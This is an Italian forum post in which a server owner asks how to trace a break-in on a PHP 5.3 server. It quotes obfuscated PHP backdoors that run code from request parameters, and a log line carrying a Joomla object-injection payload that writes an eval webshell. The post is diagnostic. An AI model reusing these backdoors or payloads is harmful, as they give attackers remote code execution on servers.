Ho un server che al momento è stato violato. I file vengono creati sul mio server con contenuti di questo tipo:
if(isset($_REQUEST['oUS'])){/*PJEG*/eval($_REQUEST['oUS']);/*z*/exit;/*Lv*/}
O come questo:
<?php /*auV*/if/*fpFF*/(isset($_REQUEST['ufopf']))/*LpY*/{/*klY*/$P=/*OMca*/"assert";/*h*/$m=$P/*gN*/(/*N*/$_REQUEST['ufopf'])/*It*/;/*gSAI*/exit;/*W*/}?>
E altri.
Anche lo stesso codice è stato iniettato su più altri file che erano già sul server.
Ho pensato a due possibilità per determinare chi mi ha hackerato e da dove:
Prima ho esaminato i log dal server (GET, richieste POST) per vedere cosa è successo, quando, l'IP da dove è stata fatta la richiesta, ecc. Non ha avuto successo, non ho trovato nulla che potesse suggerire chi e come il server è stato violato Potrebbe essere attraverso un modulo, potrebbe essere qualsiasi cosa ... Qualche idea su come posso determinarlo?
La seconda cosa che ho provato è stata esaminare i registri FTP. Pensavo che qualcuno avesse avuto accesso ad esso e caricato quei file malware. Anche in questo caso, non c'era nulla che suggerisse che i file che vedo sul mio server fossero caricati tramite FTP, perché non riuscivo a trovare quei file nei registri FTP.
Chiunque può suggerire qualche altro consiglio o consiglio su questo? Come posso determinare in che modo questi file sono stati creati o caricati sul server? E come posso determinare da dove provengono le richieste dai file iniettati?
Se la mia domanda è estemporanea, accetterò i suggerimenti per eliminarlo e pubblicarlo da qualche altra parte.
Informazioni server:
Versione PHP 5.3.29
Sistema: Linux server.myserver.com 3.10.0-327.4.5.el7.x86_64
Apache 2.0
UPDATE :
Ho trovato alcune linee sospette che assomigliano a questo:
204.12.207.202 - - [13/Jul/2017:16:05:41 +0300] "GET / HTTP/1.1" 200 73776 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\0\0\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:216:\"eval(base64_decode(ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2xseC5waHAnLCc4RDlBQUVFQzREOEU0NDM5Mjk5MDQ2QjhDREIzRjc4MiA8P3BocCBAZXZhbCgkX1BPU1RbInhpYW9iYWlmayJdKTsnKTs));JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\0\0\0connection\";b:1;}\xf0\x9d\x8c\x86"